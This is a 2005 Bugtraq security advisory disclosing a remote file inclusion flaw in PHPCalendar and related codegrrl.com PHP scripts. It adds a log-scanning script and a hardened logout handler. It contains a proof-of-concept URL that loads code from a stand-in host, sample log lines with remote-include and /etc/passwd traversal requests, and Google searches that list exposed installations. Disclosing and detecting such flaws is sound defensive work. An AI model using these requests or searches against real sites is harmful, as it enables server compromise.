
List:       bugtraq
Subject:    PHPCalendar (and some more codegrrl.com products) arbitrary code
From:       r.verton () gmail ! com
Date:       2005-11-13 11:51:17
Message-ID: 20051113115117.8031.qmail () securityfocus ! com

PHPCalendar (and some more codegrrl.com products) arbitrary code execution
==========================================================================


   Software: PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, PHPQuotes
   Severity: Arbitrary code execution
   Risk: High
   Author: Robin Verton <r.verton@gmail.com>
   Date: Sep. 24 2005
   Vendor: codegrrl.com [contacted]


   Description:

	Written in PHP/MySQL, PHPCalendar is a script designed especially to help webmasters maintain a calendar with all upcoming events and birthdays. It was designed to be used at personal sites, but it can also be very useful for fansites, to keep track of tours, premieres, award shows, TV appearances, interviews, magazine features, and much more! You can see it in use at unfloopy.net. [http://www.codegrrl.com/]


   Details:

	1) protection.php (with register_globals = On)
	   If register_globals is on, an attacker can include an arbitrary PHP file and execute malicious code.


	   // $siteurl is never initialised in this file; with register_globals = On
	   // it is populated straight from the request (e.g. ?siteurl=...)
	   $logout_page = "$siteurl";

	   [...]

	   // $action comes from the request in the same way
	   if ($action == "logout")
	   {
        	Setcookie("logincookie[pwd]","",time() -86400);
        	Setcookie("logincookie[user]","",time() - 86400);
        	// include() of an attacker-chosen path or URL (the @ only hides warnings)
        	@include($logout_page);
		exit;
	   }

   Proof of Concept:

	   To exploit this vulnerability an attacker only has to send the following HTTP request: http://www.example.com/protection.php?action=logout&siteurl=http://yourhost.com/malicoius-code.txt
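The request pattern above is easy to spot in web-server logs after the fact. The following PHP script is an added example (not part of the original advisory) that scans access-log lines in Apache/nginx "combined" format for calls to protection.php that carry a client-supplied siteurl parameter; because the legitimate script only ever sets that value server-side, any occurrence in a request is an injection attempt, and a scheme-prefixed value (http://, ftp://, a PHP stream wrapper) marks the remote-include variant. The log lines, IP addresses and host names are constructed for the demonstration.

```php
<?php
// Added example: defender-side scan of access logs for the register_globals
// injection described in the advisory. Not code from the advisory or vendor.

/**
 * Classify a request path. Returns null when the request is benign, otherwise
 * 'remote' (siteurl carries a URL scheme) or 'local' (any other siteurl value).
 */
function classifyProtectionRequest(string $requestPath): ?string
{
    $parts = parse_url($requestPath);
    if (!isset($parts['path'], $parts['query'])) {
        return null;
    }
    if (basename($parts['path']) !== 'protection.php') {
        return null;
    }
    parse_str($parts['query'], $params);          // also percent-decodes values
    if (($params['action'] ?? '') !== 'logout' || !isset($params['siteurl'])) {
        return null;
    }
    // A client never legitimately supplies siteurl; the script takes it from
    // its own configuration. A scheme prefix is the remote-file-include form.
    return preg_match('#^[a-z][a-z0-9+.-]*://#i', $params['siteurl']) ? 'remote' : 'local';
}

/**
 * Scan combined-format log lines. Returns [lineNumber => [clientIp, kind]].
 */
function scanAccessLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        // <ip> <ident> <user> [<date>] "<METHOD> <path> HTTP/x.y" <status> ...
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $kind = classifyProtectionRequest($m[2]);
        if ($kind !== null) {
            $hits[$i + 1] = [$m[1], $kind];
        }
    }
    return $hits;
}

// Constructed sample log (documentation IP ranges, .invalid host name).
$sampleLog = [
    '192.0.2.10 - - [13/Nov/2005:11:51:17 +0000] "GET /calendar/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [13/Nov/2005:11:52:03 +0000] "GET /calendar/protection.php?action=logout HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Nov/2005:11:53:40 +0000] "GET /calendar/protection.php?action=logout&siteurl=http://attacker.invalid/payload.txt HTTP/1.0" 200 88 "-" "curl/7.15"',
    '198.51.100.7 - - [13/Nov/2005:11:54:02 +0000] "GET /calendar/protection.php?action=logout&siteurl=..%2F..%2Fetc%2Fpasswd HTTP/1.0" 200 88 "-" "curl/7.15"',
];

foreach (scanAccessLog($sampleLog) as $lineNo => [$ip, $kind]) {
    echo "line {$lineNo}: {$kind} include attempt against protection.php from {$ip}\n";
}
```

Run it with `php scan.php`; lines 3 and 4 of the sample are reported (remote and local respectively), the plain logout on line 2 is not. The same classifier can be wired into a WAF or SIEM rule: the signal is simply "siteurl present on a protection.php request".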


   Patch:
           Set register_globals to off in php.ini, or disallow direct access to protection.php, e.g. define a constant in the application's entry points and use code like

	   if( !defined('IN_SYS') ) {
	   	die('Hacking attempt');
	   } 

	   in protection.php to prevent direct access.
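The constant check above stops the direct request but still leaves `$logout_page` fed from a global. The script below is an added example, not the vendor's fix, of a logout handler that closes both holes: it reads input only from `$_GET`, takes the logout page from a server-side setting, and restricts that setting to an allowlisted local file resolved under the script's own directory, so no configuration of register_globals, allow_url_fopen or allow_url_include can turn the include into remote code execution. The IN_SYS constant, the file names and the cookie names come from the advisory; the allowlist, `resolveLogoutPage()` and the combined single-file layout are assumptions for the demonstration (in a real deployment the config block lives in a separate file that the entry points include first). The code targets PHP 7 or later; register_globals itself was removed in PHP 5.4.

```php
<?php
// Added example (not the vendor's code): hardened logout handling for
// protection.php. Assumptions: config and handler are shown in one file here.

// --- config.php (assumed; in practice a separate file) ----------------------
// Entry points define IN_SYS before including helpers, so a helper fetched
// directly over HTTP sees the constant undefined and stops.
define('IN_SYS', true);
// Server-side setting, never read from the request. A bare file name only.
$logout_page = 'index.php';

// --- protection.php (hardened) ---------------------------------------------
if (!defined('IN_SYS')) {
    die('Hacking attempt');
}

/**
 * Map the configured logout page to an absolute path that is guaranteed to be
 * an allowlisted file inside $baseDir. Returns null for anything else, which
 * rejects URLs, stream wrappers (php://, data://), traversal and unknown files.
 */
function resolveLogoutPage(string $configuredPage, string $baseDir): ?string
{
    $allowed = ['index.php', 'logout.php'];   // assumed list of local pages
    if (!in_array($configuredPage, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $configuredPage);
    if ($base === false || $path === false) {
        return null;                           // file missing or base unreadable
    }
    // realpath() has already collapsed any ".." segments; this confirms the
    // result still lies under the application directory.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Handle ?action=logout. Inputs come from $_GET only, so a plain global named
 * $action or $siteurl set by register_globals has no effect on this code.
 */
function handleLogout(array $get, string $configuredPage, string $baseDir): bool
{
    if (($get['action'] ?? '') !== 'logout') {
        return false;
    }
    // Expire the login cookies exactly as the original code does.
    setcookie('logincookie[pwd]', '', time() - 86400);
    setcookie('logincookie[user]', '', time() - 86400);

    $page = resolveLogoutPage($configuredPage, $baseDir);
    if ($page === null) {
        // Misconfiguration: fall back to a fixed redirect rather than including
        // anything at all. No attacker-controlled data reaches include().
        header('Location: /');
        return true;
    }
    include $page;
    return true;
}

if (handleLogout($_GET, $logout_page, __DIR__)) {
    exit;
}
```

Note the ordering: the `IN_SYS` guard is the first statement after the config block, before any function is called, and `include` receives only the value returned by `resolveLogoutPage()`, never a variable that a request could populate. If the site needs to send users somewhere off-site after logout, replace the `include` with a `header('Location: ...')` to a fixed, configured URL; including a remote resource is never required for a logout.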
  
   Credits:

       Credit goes to Robin Verton, 15 years old from Germany

   References:

       [1] http://codegrrl.com
       [2] http://www.google.com/search?q=%22Powered+by%3A+PHPFanBase%22 [about 112,000 results]
       [3] http://www.google.com/search?q=%22Powered+by%3A+PHPCalendar%22 [about 44,000 results]
       [4] http://www.google.com/search?q=%22Powered+by%3A+PHPCurrently%22 [about 44,000 results]
       [5] http://www.google.com/search?q=%22Powered+by%3A+PHPClique%22
       [6] http://www.google.com/search?q=%22Powered+by%3A+PHPQuotes%22

